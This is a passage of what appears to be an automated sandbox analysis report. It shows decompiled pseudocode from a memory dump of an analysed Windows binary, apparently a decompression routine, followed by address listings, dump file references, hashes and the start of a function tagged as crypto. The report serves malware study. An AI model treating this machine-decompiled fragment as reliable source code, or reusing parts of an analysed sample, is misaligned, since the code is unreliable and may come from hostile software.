										_t465 = _t464 & 0x0000fffe;
										__eflags = _t465 -  *((intOrPtr*)(_t760 + 0xf84 + _t733 * 4));
										if(_t465 >=  *((intOrPtr*)(_t760 + 0xf84 + _t733 * 4))) {
											_t555 = 0xf;
											_t633 = _t733 + 1;
											__eflags = _t633 - _t555;
											if(_t633 >= _t555) {
												L49:
												_t635 =  *(_t758 + 4) + _t555;
												 *(_t758 + 4) = _t635 & 0x00000007;
												 *_t758 =  *_t758 + (_t635 >> 3);
												_t637 = 0x10;
												_t468 = (_t465 -  *((intOrPtr*)(_t760 + 0xf80 + _t555 * 4)) >> _t637 - _t555) +  *((intOrPtr*)(_t760 + 0xfc4 + _t555 * 4));
												__eflags = _t468 -  *((intOrPtr*)(_t760 + 0xf80));
												if(_t468 >=  *((intOrPtr*)(_t760 + 0xf80))) {
													_t468 = 0;
													__eflags = 0;
												}
												_t469 =  *(_t760 + 0x1c08 + _t468 * 2) & 0x0000ffff;
												goto L52;
											} else {
												_t753 = _t760 + 0xf84 + _t633 * 4;
												while(1) {
													__eflags = _t465 -  *_t753;
													if(_t465 <  *_t753) {
														_t555 = _t633;
														goto L49;
													}
													_t633 = _t633 + 1;
													_t753 = _t753 + 4;
													__eflags = _t633 - 0xf;
													if(_t633 < 0xf) {
														continue;
													} else {
														goto L49;
													}
												}
												goto L49;
											}
										} else {
											_t670 = 0x10;
											_t505 = _t465 >> _t670 - _t733;
											_t673 = ( *(_t505 + _t760 + 0x1008) & 0x000000ff) +  *(_t758 + 4);
											 *_t758 =  *_t758 + (_t673 >> 3);
											 *(_t758 + 4) = _t673 & 0x00000007;
											_t469 =  *(_t760 + 0x1408 + _t505 * 2) & 0x0000ffff;
											L52:
											__eflags = _t469 - 4;
											if(_t469 >= 4) {
												_t558 = (_t469 >> 1) - 1;
												_v12 = ((_t469 & 0x00000001 | 0x00000002) << _t558) + 1;
												__eflags = _t558;
												if(_t558 <= 0) {
													L71:
													_t559 = _v12;
													__eflags = _t559 - 0x100;
													if(_t559 > 0x100) {
														_a4 = _v16 + 1;
														__eflags = _t559 - 0x2000;
														if(_t559 > 0x2000) {
															_a4 = _a4 + 1;
															__eflags = _t559 - 0x40000;
															if(_t559 > 0x40000) {
																_t147 =  &_a4;
																 *_t147 = _a4 + 1;
																__eflags =  *_t147;
															}
														}
													}
													__eflags =  *((char*)(_t760 + 0x4c38));
													_t640 = _a4;
													 *((intOrPtr*)(_t760 + 0x60)) =  *((intOrPtr*)(_t760 + 0x5c));
													 *((intOrPtr*)(_t760 + 0x5c)) =  *((intOrPtr*)(_t760 + 0x58));
													 *((intOrPtr*)(_t760 + 0x58)) =  *((intOrPtr*)(_t760 + 0x54));
													 *((intOrPtr*)(_t760 + 0x54)) = _t559;
													 *(_t760 + 0x68) = _t640;
													_t477 = _t760 + 0x70;
													if( *((char*)(_t760 + 0x4c38)) == 0) {
														_t736 =  *_t477;
														_v8 = _t640;
														_t642 = _t736 - _t559;
														_t561 =  *((intOrPtr*)(_t760 + 0xe6f4)) + 0xffffefff;
														_v16 = _t642;
														__eflags = _t642 - _t561;
														if(_t642 >= _t561) {
															L97:
															__eflags = _a4;
															if(_a4 <= 0) {
																while(1) {
																	 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
																	if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
																		goto L15;
																	} else {
																		_t540 = _t760 + 0x80;
																	}
																	goto L7;
																}
															}
															L98:
															_t562 =  *(_t760 + 0xe6f8);
															do {
																_v8 = _v8 - 1;
																 *((char*)( *((intOrPtr*)(_t760 + 0x4b34)) +  *_t477)) =  *((intOrPtr*)((_t642 & _t562) +  *((intOrPtr*)(_t760 + 0x4b34))));
																_t562 =  *(_t760 + 0xe6f8);
																_t642 = _v16 + 1;
																__eflags = _v8;
																_v16 = _t642;
																 *_t477 =  *_t477 + 0x00000001 & _t562;
															} while (_v8 > 0);
															continue;
															do {
																while(1) {
																	 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
																	if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
																		goto L15;
																	} else {
																		_t540 = _t760 + 0x80;
																	}
																	goto L7;
																}
																goto L97;
															} while (_a4 <= 0);
															goto L98;
														}
														__eflags = _t736 - _t561;
														if(_t736 >= _t561) {
															goto L97;
														}
														_t551 =  *((intOrPtr*)(_t760 + 0x4b34)) + _t642;
														_v16 =  *((intOrPtr*)(_t760 + 0x4b34)) + _t736;
														_t648 = _a4;
														 *_t477 = _t736 + _t648;
														__eflags = _v12 - _t648;
														if(_v12 >= _t648) {
															__eflags = _t648 - 8;
															if(_t648 < 8) {
																L88:
																_t625 = _v8;
																L89:
																__eflags = _t625;
																if(_t625 > 0) {
																	_t447 = _v16;
																	 *_t447 =  *_t551;
																	__eflags = _t625 - 1;
																	if(_t625 > 1) {
																		 *((char*)(_t447 + 1)) =  *((intOrPtr*)(_t551 + 1));
																		__eflags = _t625 - 2;
																		if(_t625 > 2) {
																			 *((char*)(_t447 + 2)) =  *((intOrPtr*)(_t551 + 2));
																			__eflags = _t625 - 3;
																			if(_t625 > 3) {
																				 *((char*)(_t447 + 3)) =  *((intOrPtr*)(_t551 + 3));
																				__eflags = _t625 - 4;
																				if(_t625 > 4) {
																					 *((char*)(_t447 + 4)) =  *((intOrPtr*)(_t551 + 4));
																					__eflags = _t625 - 5;
																					if(_t625 > 5) {
																						 *((char*)(_t447 + 5)) =  *((intOrPtr*)(_t551 + 5));
																						__eflags = _t625 - 6;
																						if(_t625 > 6) {
																							 *((char*)(_t447 + 6)) =  *((intOrPtr*)(_t551 + 6));
																						}
																					}
																				}
																			}
																		}
																	}
																}
																continue;
																do {
																	while(1) {
																		 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
																		if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
																			goto L15;
																		} else {
																			_t540 = _t760 + 0x80;
																		}
																		goto L7;
																	}
																	L162:
																	__eflags = _v12;
																} while (_v12 <= 0);
																_t541 =  *(_t760 + 0xe6f8);
																do {
																	_a4 = _a4 - 1;
																	 *((char*)( *((intOrPtr*)(_t760 + 0x4b34)) +  *_t420)) =  *((intOrPtr*)((_t593 & _t541) +  *((intOrPtr*)(_t760 + 0x4b34))));
																	_t541 =  *(_t760 + 0xe6f8);
																	_t593 = _v8 + 1;
																	__eflags = _a4;
																	_v8 = _t593;
																	 *_t420 =  *_t420 + 0x00000001 & _t541;
																} while (_a4 > 0);
																continue;
																do {
																	do {
																		do {
																			goto L7;
																			L107:
																			_t445 =  *(_t760 + 0x68);
																			__eflags = _t445;
																		} while (_t445 == 0);
																		__eflags =  *((char*)(_t760 + 0x4c38));
																		if( *((char*)(_t760 + 0x4c38)) == 0) {
																			_a4 = _t445;
																			_t446 = _t760 + 0x70;
																			_t713 =  *_t446;
																			_t618 = _t713 -  *((intOrPtr*)(_t760 + 0x54));
																			_t547 =  *((intOrPtr*)(_t760 + 0xe6f4)) + 0xffffefff;
																			_v16 = _t618;
																			__eflags = _t618 - _t547;
																			if(_t618 >= _t547) {
																				goto L121;
																			}
																			__eflags = _t713 - _t547;
																			if(_t713 >= _t547) {
																				goto L121;
																			}
																			_t551 =  *((intOrPtr*)(_t760 + 0x4b34)) + _t618;
																			_v16 =  *((intOrPtr*)(_t760 + 0x4b34)) + _t713;
																			_t624 = _a4;
																			 *_t446 = _t713 + _t624;
																			__eflags =  *((intOrPtr*)(_t760 + 0x54)) - _t624;
																			if( *((intOrPtr*)(_t760 + 0x54)) >= _t624) {
																				__eflags = _t624 - 8;
																				if(_t624 < 8) {
																					L120:
																					_t625 = _a4;
																					goto L89;
																				}
																				_t449 = _t624 >> 3;
																				__eflags = _t449;
																				_v12 = _t449;
																				do {
																					E0041BB80(_t551, _t758, _t760, _v16, _t551, 8);
																					_v16 = _v16 + 8;
																					_a4 = _a4 - 8;
																					_t761 = _t761 + 0xc;
																					_t551 = _t551 + 8;
																					_t263 =  &_v12;
																					 *_t263 = _v12 - 1;
																					__eflags =  *_t263;
																				} while ( *_t263 != 0);
																				goto L120;
																			}
																			__eflags = _t624 - 8;
																			if(_t624 < 8) {
																				goto L120;
																			}
																			_t451 = _v16;
																			_t627 = _t624 >> 3;
																			__eflags = _t627;
																			do {
																				_a4 = _a4 - 8;
																				 *_t451 =  *_t551;
																				 *((char*)(_t451 + 1)) =  *((intOrPtr*)(_t551 + 1));
																				 *((char*)(_t451 + 2)) =  *((intOrPtr*)(_t551 + 2));
																				 *((char*)(_t451 + 3)) =  *((intOrPtr*)(_t551 + 3));
																				 *((char*)(_t451 + 4)) =  *((intOrPtr*)(_t551 + 4));
																				 *((char*)(_t451 + 5)) =  *((intOrPtr*)(_t551 + 5));
																				 *((char*)(_t451 + 6)) =  *((intOrPtr*)(_t551 + 6));
																				 *((char*)(_t451 + 7)) =  *((intOrPtr*)(_t551 + 7));
																				_t551 = _t551 + 8;
																				_t451 = _t451 + 8;
																				_t627 = _t627 - 1;
																				__eflags = _t627;
																			} while (_t627 != 0);
																			_v16 = _t451;
																			goto L120;
																		}
																		_push( *(_t760 + 0xe6f8));
																		_push(_t760 + 0x70);
																		_push( *((intOrPtr*)(_t760 + 0x54)));
																		_push(_t445);
																		goto L77;
																		L103:
																		_t456 = E004152AF(_t760,  &_v32);
																		__eflags = _t456;
																	} while (_t456 != 0);
																	goto L104;
																	L121:
																	__eflags = _a4;
																} while (_a4 <= 0);
																_t548 =  *(_t760 + 0xe6f8);
																do {
																	_a4 = _a4 - 1;
																	 *((char*)( *((intOrPtr*)(_t760 + 0x4b34)) +  *_t446)) =  *((intOrPtr*)((_t618 & _t548) +  *((intOrPtr*)(_t760 + 0x4b34))));
																	_t548 =  *(_t760 + 0xe6f8);
																	_t618 = _v16 + 1;
																	__eflags = _a4;
																	_v16 = _t618;
																	 *_t446 =  *_t446 + 0x00000001 & _t548;
																} while (_a4 > 0);
																 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
																if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
																	goto L15;
																} else {
																	_t540 = _t760 + 0x80;
																}
															}
															_t479 = _a4 >> 3;
															__eflags = _t479;
															_a4 = _t479;
															do {
																E0041BB80(_t551, _t758, _t760, _v16, _t551, 8);
																_v16 = _v16 + 8;
																_v8 = _v8 - 8;
																_t761 = _t761 + 0xc;
																_t551 = _t551 + 8;
																_t195 =  &_a4;
																 *_t195 = _a4 - 1;
																__eflags =  *_t195;
															} while ( *_t195 != 0);
															goto L88;
														}
														__eflags = _t648 - 8;
														if(_t648 < 8) {
															goto L88;
														}
														_t482 = _t648 >> 3;
														__eflags = _t482;
														_t649 = _t482;
														_t483 = _v16;
														do {
															_v8 = _v8 - 8;
															 *_t483 =  *_t551;
															 *((char*)(_t483 + 1)) =  *((intOrPtr*)(_t551 + 1));
															 *((char*)(_t483 + 2)) =  *((intOrPtr*)(_t551 + 2));
															 *((char*)(_t483 + 3)) =  *((intOrPtr*)(_t551 + 3));
															 *((char*)(_t483 + 4)) =  *((intOrPtr*)(_t551 + 4));
															 *((char*)(_t483 + 5)) =  *((intOrPtr*)(_t551 + 5));
															 *((char*)(_t483 + 6)) =  *((intOrPtr*)(_t551 + 6));
															 *((char*)(_t483 + 7)) =  *((intOrPtr*)(_t551 + 7));
															_t551 = _t551 + 8;
															_t483 = _t483 + 8;
															_t649 = _t649 - 1;
															__eflags = _t649;
														} while (_t649 != 0);
														_v16 = _t483;
														goto L88;
													} else {
														_push( *(_t760 + 0xe6f8));
														_push(_t477);
														_push(_t559);
														_push(_t640);
														L77:
														E0041217C();
														while(1) {
															 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
															if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
																goto L15;
															} else {
																_t540 = _t760 + 0x80;
															}
															goto L7;
														}
													}
												}
												__eflags = _t558 - 4;
												if(__eflags < 0) {
													_t486 = E0041262C(_t758);
													_t651 = 0x20;
													_v12 = _v12 + (_t486 >> _t651 - _t558);
													_t489 =  *(_t758 + 4) + _t558;
													 *_t758 =  *_t758 + (_t489 >> 3);
													_t490 = _t489 & 0x00000007;
													__eflags = _t490;
													 *(_t758 + 4) = _t490;
													goto L71;
												}
												if(__eflags > 0) {
													_t498 = E0041262C(_t758);
													_t668 = 0x24;
													_v12 = _v12 + (_t498 >> _t668 - _t558 << 4);
													_t569 =  *(_t758 + 4) + _t558 - 4;
													 *_t758 =  *_t758 + (_t569 >> 3);
													_t570 = _t569 & 0x00000007;
													__eflags = _t570;
													 *(_t758 + 4) = _t570;
												}
												_t491 = E004094F9(_t758);
												_t565 =  *(_t760 + 0x1ef0);
												_t492 = _t491 & 0x0000fffe;
												__eflags = _t492 -  *((intOrPtr*)(_t760 + 0x1e70 + _t565 * 4));
												if(_t492 >=  *((intOrPtr*)(_t760 + 0x1e70 + _t565 * 4))) {
													_t750 = 0xf;
													_t656 = _t565 + 1;
													__eflags = _t656 - _t750;
													if(_t656 >= _t750) {
														L66:
														_t658 =  *(_t758 + 4) + _t750;
														 *(_t758 + 4) = _t658 & 0x00000007;
														 *_t758 =  *_t758 + (_t658 >> 3);
														_t660 = 0x10;
														_t495 = (_t492 -  *((intOrPtr*)(_t760 + 0x1e6c + _t750 * 4)) >> _t660 - _t750) +  *((intOrPtr*)(_t760 + 0x1eb0 + _t750 * 4));
														__eflags = _t495 -  *((intOrPtr*)(_t760 + 0x1e6c));
														if(_t495 >=  *((intOrPtr*)(_t760 + 0x1e6c))) {
															_t495 = 0;
															__eflags = 0;
														}
														_t496 =  *(_t760 + 0x2af4 + _t495 * 2) & 0x0000ffff;
														goto L69;
													}
													_t568 = _t760 + 0x1e70 + _t656 * 4;
													while(1) {
														__eflags = _t492 -  *_t568;
														if(_t492 <  *_t568) {
															break;
														}
														_t656 = _t656 + 1;
														_t568 = _t568 + 4;
														__eflags = _t656 - 0xf;
														if(_t656 < 0xf) {
															continue;
														}
														goto L66;
													}
													_t750 = _t656;
													goto L66;
												} else {
													_t662 = 0x10;
													_t497 = _t492 >> _t662 - _t565;
													_t665 = ( *(_t497 + _t760 + 0x1ef4) & 0x000000ff) +  *(_t758 + 4);
													 *_t758 =  *_t758 + (_t665 >> 3);
													 *(_t758 + 4) = _t665 & 0x00000007;
													_t496 =  *(_t760 + 0x22f4 + _t497 * 2) & 0x0000ffff;
													L69:
													_v12 = _v12 + _t496;
													goto L71;
												}
											}
											_v12 = _t469 + 1;
											goto L71;
										}
									}
								} else {
									__eflags =  *((char*)(_t760 + 0x4c38));
									if( *((char*)(_t760 + 0x4c38)) == 0) {
										 *( *((intOrPtr*)(_t760 + 0x4b34)) +  *(_t760 + 0x70)) = _t530;
										 *(_t760 + 0x70) =  *(_t760 + 0x70) + 1;
									} else {
										 *(_t760 + 0x70) =  *(_t760 + 0x70) + 1;
										 *(E00412144(_t760 + 0x4b38,  *(_t760 + 0x70))) = _t530;
									}
									while(1) {
										 *(_t760 + 0x70) =  *(_t760 + 0x70) &  *(_t760 + 0xe6f8);
										if( *_t758 <  *((intOrPtr*)(_t760 + 0x7c))) {
											goto L15;
										} else {
											_t540 = _t760 + 0x80;
										}
										goto L7;
									}
								}
							}
						}
						__eflags = _t398 - _t574;
						if(_t398 == _t574) {
							goto L21;
						}
						E00414E8A(_t760);
						_t517 =  *((intOrPtr*)(_t760 + 0x4c54));
						__eflags = _t517 -  *((intOrPtr*)(_t760 + 0x4c44));
						if(__eflags > 0) {
							goto L105;
						}
						if(__eflags < 0) {
							L20:
							__eflags =  *((char*)(_t760 + 0x4c48));
							if( *((char*)(_t760 + 0x4c48)) != 0) {
								 *((char*)(_t760 + 0x4c58)) = 0;
								return _t517;
							}
							goto L21;
						}
						_t517 =  *((intOrPtr*)(_t760 + 0x4c50));
						__eflags = _t517 -  *((intOrPtr*)(_t760 + 0x4c40));
						if(_t517 >  *((intOrPtr*)(_t760 + 0x4c40))) {
							goto L105;
						}
						goto L20;
					}
				}
				E0041530F(__ecx, _a4);
				_t517 = E00411F1D(_t526, _t760);
				if(_t517 == 0) {
					goto L105;
				}
				_t759 = _t760 + 0x80;
				_push(_t760 + 0x80);
				_t572 = _t760 + 4;
				_push(_t760 + 4);
				_t517 = E00414050(_t760 + 4, _t760);
				if(_t517 == 0) {
					goto L105;
				}
				_t517 = E0041416C(_t572, _t760, _t572, _t759, _t760 + 0x94);
				if(_t517 == 0) {
					goto L105;
				}
				goto L4;
			}

0x0041676f
0x00416779
0x00416780
0x004167cb
0x004167cb
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x004167e4
0x004167e4
0x004167f2
0x004167f4
0x00000000
0x00000000
0x0041680a
0x00416daa
0x00000000
0x00416dac
0x00416810
0x00416811
0x00416814
0x0041681b
0x00416db5
0x00416db5
0x00416821
0x0041682c
0x00416833
0x00000000
0x00000000
0x00000000
0x00000000
0x00416833
0x0041681b
0x0041683c
0x00416841
0x00416843
0x00000000
0x00000000
0x00416849
0x00416849
0x0041684f
0x0041685c
0x00416862
0x004168a2
0x004168a4
0x004168a9
0x004168af
0x004168b4
0x004168bb
0x004168e8
0x004168e9
0x004168ec
0x004168ee
0x00416908
0x0041690b
0x00416912
0x00416918
0x00416923
0x00416928
0x0041692f
0x00416935
0x00416937
0x00416937
0x00416937
0x00416939
0x00000000
0x004168f0
0x004168f0
0x004168f7
0x004168f7
0x004168f9
0x00416906
0x00416906
0x00416906
0x004168fb
0x004168fc
0x004168ff
0x00416902
0x00000000
0x00416904
0x00000000
0x00416904
0x00416902
0x00000000
0x004168f7
0x004168bd
0x004168bf
0x004168c2
0x004168cc
0x004168d4
0x004168d9
0x004168dc
0x00416941
0x00416946
0x00416948
0x00416983
0x00416989
0x00416d83
0x00416d85
0x00416db8
0x00416dbe
0x00416ef8
0x00416ef8
0x00416efe
0x00416f04
0x00416f07
0x00416f09
0x00416f18
0x00416f1d
0x00416f20
0x00416f25
0x00416f2b
0x00416f30
0x00416f37
0x00416f64
0x00416f65
0x00416f68
0x00416f6a
0x00416f84
0x00416f87
0x00416f8e
0x00416f94
0x00416f9f
0x00416fa4
0x00416fab
0x00416fb1
0x00416fb3
0x00416fb3
0x00416fb3
0x00416fb5
0x00416fbd
0x00416fbd
0x00416fc0
0x00416fd2
0x00416fdc
0x00416fdf
0x00416fe1
0x00416fe5
0x00416fec
0x00416ff1
0x00416ff7
0x00416ffe
0x00417000
0x00417000
0x00417003
0x00417003
0x00416fc2
0x00416fc5
0x00416fc5
0x00417006
0x00417010
0x00417013
0x00417033
0x00417036
0x00417039
0x0041703d
0x00417040
0x00417046
0x00417049
0x0041704b
0x00000000
0x00000000
0x00417051
0x00417053
0x00000000
0x00000000
0x00417059
0x0041705f
0x00417064
0x00417067
0x0041706d
0x00417070
0x00417073
0x004170c2
0x004170c5
0x004170ee
0x004170ee
0x004170f2
0x004170f8
0x004170fe
0x00417101
0x00417103
0x00417109
0x00417110
0x00417113
0x00417119
0x00417120
0x00417123
0x00417129
0x00417130
0x00417133
0x00417139
0x00417140
0x00417143
0x00417149
0x00417150
0x00417153
0x0041715c
0x0041715c
0x00417153
0x00417143
0x00417133
0x00417123
0x00417113
0x00417103
0x00000000
0x004170f2
0x004170ca
0x004170ca
0x004170cd
0x004170d0
0x004170d6
0x004170db
0x004170df
0x004170e3
0x004170e6
0x004170e9
0x004170e9
0x004170e9
0x004170e9
0x00000000
0x004170d0
0x00417075
0x00417078
0x00000000
0x00000000
0x0041707a
0x0041707a
0x0041707d
0x0041707f
0x00417082
0x00417084
0x00417088
0x0041708d
0x00417093
0x00417099
0x0041709f
0x004170a5
0x004170ab
0x004170b1
0x004170b4
0x004170b7
0x004170ba
0x004170ba
0x004170ba
0x004170bd
0x00000000
0x00417015
0x00417015
0x0041701e
0x0041701f
0x00417022
0x00000000
0x00417022
0x00417013
0x00416f6c
0x00416f73
0x00416f73
0x00416f75
0x00000000
0x00000000
0x00416f77
0x00416f78
0x00416f7b
0x00416f7e
0x00000000
0x00000000
0x00000000
0x00416f80
0x00416f82
0x00000000
0x00416f82
0x00416f3b
0x00416f3e
0x00416f48
0x00416f50
0x00416f55
0x00416f58
0x00000000
0x00000000
0x00000000
0x00000000
0x00416f0b
0x00416f0b
0x00416f0e
0x00416f10
0x00416f11
0x00416f14
0x00416f14
0x00000000
0x00416f0b
0x00000000
0x00416dbe
0x00416d8a
0x00416d8e
0x00416d93
0x00416d95
0x00000000
0x00000000
0x00000000
0x0041698f
0x0041698f
0x00416995
0x00416998
0x004169aa
0x004169b4
0x004169b7
0x004169b9
0x004169bd
0x004169c4
0x004169c9
0x004169cf
0x004169d6
0x004169d8
0x004169d8
0x004169db
0x004169db
0x0041699a
0x0041699d
0x0041699d
0x004169e3
0x004169e6
0x004169eb
0x004169f1
0x004169f6
0x004169fd
0x00416a2a
0x00416a2b
0x00416a2e
0x00416a30
0x00416a4a
0x00416a4d
0x00416a54
0x00416a5a
0x00416a65
0x00416a6a
0x00416a71
0x00416a77
0x00416a79
0x00416a79
0x00416a79
0x00416a7b
0x00000000
0x00416a32
0x00416a32
0x00416a39
0x00416a39
0x00416a3b
0x00416a48
0x00416a48
0x00416a48
0x00416a3d
0x00416a3e
0x00416a41
0x00416a44
0x00000000
0x00416a46
0x00000000
0x00416a46
0x00416a44
0x00000000
0x00416a39
0x004169ff
0x00416a01
0x00416a04
0x00416a0e
0x00416a16
0x00416a1b
0x00416a1e
0x00416a83
0x00416a83
0x00416a86
0x00416a98
0x00416aa1
0x00416aa4
0x00416aa6
0x00416ba6
0x00416ba6
0x00416ba9
0x00416baf
0x00416bb5
0x00416bb8
0x00416bbe
0x00416bc0
0x00416bc3
0x00416bc9
0x00416bcb
0x00416bcb
0x00416bcb
0x00416bcb
0x00416bc9
0x00416bbe
0x00416bce
0x00416bd8
0x00416bdb
0x00416be1
0x00416be7
0x00416bea
0x00416bed
0x00416bf0
0x00416bf3
0x00416c0e
0x00416c10
0x00416c15
0x00416c1d
0x00416c23
0x00416c26
0x00416c28
0x00416d41
0x00416d41
0x00416d45
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x00000000
0x004167dc
0x004167ce
0x00416d4b
0x00416d4b
0x00416d51
0x00416d57
0x00416d61
0x00416d69
0x00416d6f
0x00416d73
0x00416d77
0x00416d7a
0x00416d7a
0x00416d7e
0x004167ce
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x00000000
0x004167dc
0x00000000
0x004167ce
0x00000000
0x004167ce
0x00416c2e
0x00416c30
0x00000000
0x00000000
0x00416c3c
0x00416c46
0x00416c49
0x00416c4e
0x00416c50
0x00416c53
0x00416ca4
0x00416ca7
0x00416cd0
0x00416cd0
0x00416cd3
0x00416cd3
0x00416cd5
0x00416cdd
0x00416ce0
0x00416ce2
0x00416ce5
0x00416cee
0x00416cf1
0x00416cf4
0x00416cfd
0x00416d00
0x00416d03
0x00416d0c
0x00416d0f
0x00416d12
0x00416d1b
0x00416d1e
0x00416d21
0x00416d2a
0x00416d2d
0x00416d30
0x00416d39
0x00416d39
0x00416d30
0x00416d21
0x00416d12
0x00416d03
0x00416cf4
0x00416ce5
0x00000000
0x004167ce
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x00000000
0x004167dc
0x00417164
0x00417164
0x00417164
0x0041716e
0x00417174
0x0041717a
0x00417184
0x0041718c
0x00417192
0x00417196
0x0041719a
0x0041719d
0x0041719d
0x004171a1
0x004167ce
0x004167ce
0x004167ce
0x00000000
0x00416dc4
0x00416dc4
0x00416dc7
0x00416dc7
0x00416dcf
0x00416dd6
0x00416dee
0x00416df1
0x00416df4
0x00416df8
0x00416e00
0x00416e06
0x00416e09
0x00416e0b
0x00000000
0x00000000
0x00416e11
0x00416e13
0x00000000
0x00000000
0x00416e1f
0x00416e29
0x00416e2c
0x00416e31
0x00416e33
0x00416e36
0x00416e83
0x00416e86
0x00416eae
0x00416eae
0x00000000
0x00416eae
0x00416e8a
0x00416e8a
0x00416e8d
0x00416e90
0x00416e96
0x00416e9b
0x00416e9f
0x00416ea3
0x00416ea6
0x00416ea9
0x00416ea9
0x00416ea9
0x00416ea9
0x00000000
0x00416e90
0x00416e38
0x00416e3b
0x00000000
0x00000000
0x00416e3d
0x00416e40
0x00416e40
0x00416e43
0x00416e45
0x00416e49
0x00416e4e
0x00416e54
0x00416e5a
0x00416e60
0x00416e66
0x00416e6c
0x00416e72
0x00416e75
0x00416e78
0x00416e7b
0x00416e7b
0x00416e7b
0x00416e7e
0x00000000
0x00416e7e
0x00416dd8
0x00416de1
0x00416de2
0x00416de5
0x00000000
0x00416d97
0x00416d9d
0x00416da2
0x00416da2
0x00000000
0x00416eb6
0x00416eb6
0x00416eb6
0x00416ec0
0x00416ec6
0x00416ecc
0x00416ed6
0x00416ede
0x00416ee4
0x00416ee8
0x00416eec
0x00416eef
0x00416eef
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x004167dc
0x00416cac
0x00416cac
0x00416caf
0x00416cb2
0x00416cb8
0x00416cbd
0x00416cc1
0x00416cc5
0x00416cc8
0x00416ccb
0x00416ccb
0x00416ccb
0x00416ccb
0x00000000
0x00416cb2
0x00416c55
0x00416c58
0x00000000
0x00000000
0x00416c5c
0x00416c5c
0x00416c5f
0x00416c61
0x00416c64
0x00416c66
0x00416c6a
0x00416c6f
0x00416c75
0x00416c7b
0x00416c81
0x00416c87
0x00416c8d
0x00416c93
0x00416c96
0x00416c99
0x00416c9c
0x00416c9c
0x00416c9c
0x00416c9f
0x00000000
0x00416bf5
0x00416bf5
0x00416bfb
0x00416bfc
0x00416bfd
0x00416bfe
0x00416c04
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x00000000
0x004167dc
0x004167ce
0x00416bf3
0x00416aac
0x00416aaf
0x00416b85
0x00416b8c
0x00416b91
0x00416b97
0x00416b9e
0x00416ba0
0x00416ba0
0x00416ba3
0x00000000
0x00416ba3
0x00416ab5
0x00416ab9
0x00416ac0
0x00416ac8
0x00416ace
0x00416ad7
0x00416ad9
0x00416ad9
0x00416adc
0x00416adc
0x00416ae1
0x00416ae6
0x00416aec
0x00416af1
0x00416af8
0x00416b25
0x00416b26
0x00416b29
0x00416b2b
0x00416b45
0x00416b48
0x00416b4f
0x00416b55
0x00416b60
0x00416b65
0x00416b6c
0x00416b72
0x00416b74
0x00416b74
0x00416b74
0x00416b76
0x00000000
0x00416b76
0x00416b2d
0x00416b34
0x00416b34
0x00416b36
0x00000000
0x00000000
0x00416b38
0x00416b39
0x00416b3c
0x00416b3f
0x00000000
0x00000000
0x00000000
0x00416b41
0x00416b43
0x00000000
0x00416afa
0x00416afc
0x00416aff
0x00416b09
0x00416b11
0x00416b16
0x00416b19
0x00416b7e
0x00416b7e
0x00000000
0x00416b7e
0x00416af8
0x00416a89
0x00000000
0x00416a89
0x004169fd
0x0041694a
0x0041694a
0x00416951
0x00416978
0x0041697b
0x00416953
0x00416959
0x00416968
0x00416968
0x004167ce
0x004167d4
0x004167dc
0x00000000
0x004167de
0x004167de
0x004167de
0x00000000
0x004167dc
0x004167ce
0x00416948
0x004168bb
0x00416864
0x00416866
0x00000000
0x00000000
0x0041686a
0x0041686f
0x00416875
0x0041687b
0x00000000
0x00000000
0x00416881
0x00416895
0x00416895
0x0041689c
0x004171a6
0x00000000
0x004171a6
0x00000000
0x0041689c
0x00416883
0x00416889
0x0041688f
0x00000000
0x00000000
0x00000000
0x0041688f
0x004167ce
0x00416785
0x0041678c
0x00416793
0x00000000
0x00000000
0x00416799
0x0041679f
0x004167a0
0x004167a3
0x004167a6
0x004167ad
0x00000000
0x00000000
0x004167be
0x004167c5
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: fa1c6a3ae1177a25c263c3a16a38f7f462eaaabbbfaa9e062607250f67a9a740
Instruction ID: 43cf0a559b50195bade2117c9daf1dd8e56031a8b46e24bfd4f9e4bf29541018
Opcode Fuzzy Hash: fa1c6a3ae1177a25c263c3a16a38f7f462eaaabbbfaa9e062607250f67a9a740
Instruction Fuzzy Hash: 9D720570A047459FCB29CF24C5D06E9BBF1EF55308F1984AED9968B382C738E995CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004158D3, Relevance: .8, Instructions: 795
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E004158D3(void* __ecx, signed int _a4) {
				void* _v8;
				char* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t458;
				intOrPtr _t460;
				intOrPtr _t461;
				signed int _t462;
				signed int _t463;
				unsigned int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				unsigned int _t472;
				signed int _t475;
				signed int _t476;
				signed int _t481;
				intOrPtr _t498;
				unsigned int _t501;
